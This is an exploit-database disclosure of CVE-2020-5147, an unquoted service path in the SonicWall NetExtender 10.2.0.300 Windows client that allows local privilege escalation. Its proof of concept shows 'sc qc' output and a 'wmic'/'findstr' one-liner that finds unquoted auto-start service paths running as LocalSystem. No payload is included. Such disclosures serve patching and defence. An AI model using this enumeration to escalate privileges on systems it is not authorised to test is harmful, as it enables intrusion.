SonicWall NetExtender 10.2.0.300 - Unquoted Service Path

EDB-ID:

50212


Author:

shinnai

Type:

local


Platform:

Windows

Date:

2021-08-17


# Exploit Title: SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path
# Exploit Author: shinnai
# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
# Version: 10.2.0.300
# Tested On: Windows
# CVE: CVE-2020-5147

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Title: SonicWall NetExtender windows client unquoted service path 
vulnerability
Vers.: 10.2.0.300
Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/

Advisory: 
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)

URLs:
https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
https://shinnai.altervista.org/exploits/SH-029-20210109.html

Desc.:
SonicWall NetExtender Windows client vulnerable to unquoted service path 
vulnerability, this allows a local attacker to gain elevated privileges 
in the host operating system.
This vulnerability impact SonicWall NetExtender Windows client version 
10.2.300 and earlier.

Poc:

C:\>sc qc sonicwall_client_protection_svc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: sonicwall_client_protection_svc
         TIPO                      : 10  WIN32_OWN_PROCESS
         TIPO_AVVIO                : 2   AUTO_START
         CONTROLLO_ERRORE          : 1   NORMAL
         NOME_PERCORSO_BINARIO     : C:\Program Files\SonicWall\Client 
Protection Service\SonicWallClientProtectionService.exe <-- Unquoted 
Service Path Vulnerability
         GRUPPO_ORDINE_CARICAMENTO :
         TAG                       : 0
         NOME_VISUALIZZATO         : SonicWall Client Protection Service
         DIPENDENZE                :
         SERVICE_START_NAME : LocalSystem
C:\>

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

C:\>wmic service get name,displayname,pathname,startmode |findstr /i 
"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SonicWall Client Protection Service                              
sonicwall_client_protection_svc  C:\Program Files\SonicWall\Client 
Protection Service\SonicWallClientProtectionService.exe      Auto

C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------